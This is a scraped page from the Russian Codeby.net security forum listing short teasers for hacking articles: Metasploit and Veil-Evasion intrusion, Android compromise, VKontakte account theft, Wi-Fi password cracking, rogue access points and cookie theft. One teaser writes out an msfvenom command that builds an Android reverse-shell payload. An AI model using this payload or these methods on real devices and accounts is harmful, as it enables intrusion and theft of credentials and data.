Форум информационной безопасности - Codeby.net

Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

  • 61 242
  • 347
В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit. UPDATE: Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil. https://codeby.net/threads/veil-framework.60978/ Ниже представлена схема, по которой будет осуществляться проникновение. Необходимые ресурсы: 1. Kali Linux (Я использовал Kali GNU/Linux Rolling) 2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он...

Soft Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android

  • 18 023
  • 19
The Codeby
Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload. Установка и использование msfvenom payload: 1. Запустите kali и откройте панель управления. 2. Установите payload и создайте всплывающее окно пользователя вот этой командой: root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk (Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig) Файл...

Статья Взлом страницы вконтакте

  • 7 551
  • 3
Наверняка вы пролистали уже тонну информации о том как взломать чью-нибудь страницу вконтакте но все было безуспешно. Если вы новичок в этой сфере то советую прочитать введение о взломе вк прежде чем приступить. Допустим вы прочитали и вы заинтересовались данным способом. Скажу заранее что данный способ взлома страницы вк работает 100%, но есть 1 загвоздка которую в узнаете в конце. Хочу сказать в добавок что все социальные сети строго защищены и напрямую взломать вк не получится. Взлом страницы вконтакте путем клонирования Вся процедура длится 5 минут и не требует никаких особенных...

Статья Взлом вк от А до Я

  • 3 563
  • 3
Sergei webware
Все что нужно знать о взломе вк Для начала давайте развеем немного миф о взломе вк, реально ли взломать? И если реально то как это сделать. Давайте разберемся что же нам нужно для взлома вк? Понимать в идеале коддинг, как минимум знать PHP, HTML, Java , SQL и прочее.... Умение вливать свой код непостредственно в vk.com Найти или знать баги сайта Если же вы ищите в поисковике как взломать вк то поверьте, вы не обладаете знаниями перечисленные мною выше. Конечно же есть люди которые умеют это делать но никто вам не покажет и не научит так как это его хлеб. Наверное я не открою вам секрет...

Статья Как можно быстро получить все буквы русского или английского алфавита?

  • 1 676
  • 0
P
Просматривая исходник одной из программ, увидел следующую строку: List<char> alphabet = new List<char> {"A","B","C","D","E" и т.д.}; Как видно обычный лист, заполненный значениями, в плане синтаксиса ошибок нет, но есть один минус, все значения были введены вручную. С одной стороны значений не много, всего 26, в принципе можно и ввести, но если, к примеру, понадобиться добавить ещё один такой же лист, который будет содержать все буквы русского алфавита или сразу два списка обоих алфавитов в нижнем регистре, как быть тогда, тоже все руками вводить? Конечно, можно найти и скопировать уже...

Статья Получение любого Wi-Fi пароля без взлома с помощью Wifiphisher

  • 7 545
  • 1
Нужно достать пароль от Wi-Fi, но нет времени на его взлом ? В предыдущих руководствах я показал, как взламывать WEP, WPA2 и WPS, но некоторые читатели жалуются, что на взлом WPA2 уходит слишком много времени, а защита WPS включена далеко не на всех точках доступа (на мой взгляд, точек с WPS всё ещё достаточно много). Чтобы помочь вам в таких ситуациях, я расскажу о практически гарантированном способе получения пароля от Wi-Fi без всякого взлома с помощью Wifiphisher. Этапы стратегии Wifiphisher Идея заключается в создании поддельной точки доступа, а затем деаутентификации пользователя с...

Статья Как украсть Cookies (Wireshark + Parrot)

  • 2 009
  • 2
И так поскольку мы начинаем цикл изучения Parrot Security OS я решил не оставаться без участия и выложить простой материал по данной теме. Нам с вами известно что программа Wireshark обладает незаменимым для нас функционалом. Ее самая приятная функций это перехват всего и вся для последующего анализа что часто отпугивает новичков от этого сокровища.(Возможно есть что-то другое но тут уж вы меня простите) Но я не стану вам объяснять все с самого начала а дам ссылочку -> Как пользоваться Wireshark . На нашем Попугае (Parrot Security OS я ее так называю) немного изменен дизайн программы...

Статья Взлом PIN-кода WPS для получения пароля с помощью Bully

  • 27 768
  • 13
Как и в случае со всем остальным в жизни, существует множество способов получения нужной информации во время взлома. На самом деле, в рукаве у хороших хакеров всегда есть несколько трюков для взлома системы. Иначе они не были бы такими успешными. Нет такого метода, который работал бы для каждой системы и каждого конкретного случая. Я уже продемонстрировал несколько способов взлома Wi-Fi, включая взлом паролей WEP и WPA2, а так же создание создание поддельной точки доступа и посторонней точки доступа. Некоторое время назад мы показали как использовать Reaver для взлома PIN-кода WPS на...

Статья Взлом паролей WPA2-PSK с помощью Aircrack-Ng

  • 35 555
  • 24
После разработки Wi-Fi в конце 1990-х годов для обеспечения безопасности беспроводных коммуникаций был создан эквивалент конфиденциальности проводных сетей. WEP оказался крайне несовершенным и легко взламываемым стандартом. Частично тема была затронута в моём руководстве по взлому Wi-Fi для начинающих. Сейчас большинство беспроводных точек доступа используют защищённый доступ Wi-Fi 2 с предварительным ключом, так же известный как WPA2-PSK. В WPA2 применяется более сильный алгоритм шифрования AES, который очень сложно взломать (но это возможно). Слабость системы WPA2-PSK заключается в...

Статья Взлом паролей WEP с помощью Aircrack-Ng

  • 11 283
  • 2
С возвращением, мои начинающие хакеры! Когда Wi-Fi был впервые разработан и популяризован в конце 90-х годов, никого особенно не волновала безопасность. В отличие от проводных подключений, кто угодно мог просто подключиться к точке доступа Wi-Fi (AP) и пользоваться её каналом или, что гораздо хуже, перехватывать трафик. Первая попытка защитить эти точки доступа получила название эквивалент конфиденциальности проводных сетей или просто WEP. Этот метод шифрования уже довольно стар и имеет несколько известных уязвимостей. На данный момент он практически вытеснен стандартами WPA и WPA2...

Статья Некоторые инструменты для взлома на андроид устройства

  • 1 908
  • 0
P
Отказ от ответственности: Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы загрузить эти приложения, чтобы использовать их для личной выгоды, то автор и издатель не должны нести ответственность за любой причиненный вред или ущерб. OS Android – Linux-подобная операционная система, в которой разработчики имеют возможность создавать приложения для взлома самой системы Android и других приложений. В данной статье мы расскажем о программном обеспечении для Android, которое позволит превратить...

Статья Создание поддельной точки доступа для перехвата данных Wi Fi

  • 51 953
  • 50
Теперь, когда мы познакомились с технологиями, терминологией и набором инструментов aircrack-ng, можно наконец приступать к взлому Wi-Fi. Нашей первой задачей станет создание поддельной точки доступа. Многие начинающие хакеры сразу же хотят взламывать пароли к Wi-Fi, чтобы бесплатно сидеть в интернете (не беспокойтесь, мы дойдём и до этого), но есть множество других, гораздо более полезных возможностей, сопровождающихся большим риском. Например перехват данных wi fi. Что такое поддельная точка доступа ? Поддельная или мошенническая точка доступа - это такая точка, которая ведёт себя...

OFFZONE 2020

offzone

Команда онлайн

  • explorer
    explorer
    Well-known member

Пользователи онлайн

  • tryweryn
  • Сергей Качилов
  • pijagorda123
  • hardserv
  • swagcat228
  • CREATORIS
  • tyrboloto
  • D4ckD4ck
  • Zloi39
  • skihunter
  • Kuif241435rewjfed
  • kaiser113
  • italianez
  • magistr
  • Solution
  • daniiil
  • Zer0must2b
  • explorer
  • йцу
  • Winner1200
  • CognacHog
  • anatoliyjazzz
  • Hardreversengineer
  • Сергей Шишко
  • stepss
  • Евгений Сидоренко
  • Temp Noname
  • PennStation
  • mutt
  • bowadag571_mailon_ws
  • Вл-мир
  • RinGinO
  • nohchibeno
  • павел 98
  • pukla
  • SavStanis
  • Дмитрий Семилетов
  • tarantot
  • DevMob
  • jerijojo

Наши книги

Information Security

InfoSec